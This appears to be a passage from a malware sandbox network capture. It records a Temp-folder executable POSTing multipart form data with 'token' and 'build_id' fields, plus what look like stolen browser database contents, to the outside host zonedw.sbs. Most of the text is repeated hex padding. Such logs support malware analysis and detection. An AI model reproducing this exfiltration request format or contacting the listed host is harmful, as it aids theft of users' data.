                                                                                                                                                                                                                                                2024-12-13 12:52:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:51 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                                Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                                                                                                2024-12-13 12:52:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:52 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                13192.168.2.449873116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:52 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----S2VA1NO8GLNYMY58GL6F
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 66001
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:52 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 32 56 41 31 4e 4f 38 47 4c 4e 59 4d 59 35 38 47 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 53 32 56 41 31 4e 4f 38 47 4c 4e 59 4d 59 35 38 47 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 53 32 56 41 31 4e 4f 38 47 4c 4e 59 4d 59 35 38 47 4c 36 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------S2VA1NO8GLNYMY58GL6FContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------S2VA1NO8GLNYMY58GL6FContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------S2VA1NO8GLNYMY58GL6FCont
                                                                                                                                                                                                                                                2024-12-13 12:52:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:52 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:53 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:52:53 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                14192.168.2.449883116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:55 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----VS0HVS2V3W4E3EUK6P89
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 153381
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:55 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 56 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 56 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------VS0HVS2V3W4E3EUK6P89Content-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------VS0HVS2V3W4E3EUK6P89Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------VS0HVS2V3W4E3EUK6P89Cont
                                                                                                                                                                                                                                                2024-12-13 12:52:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
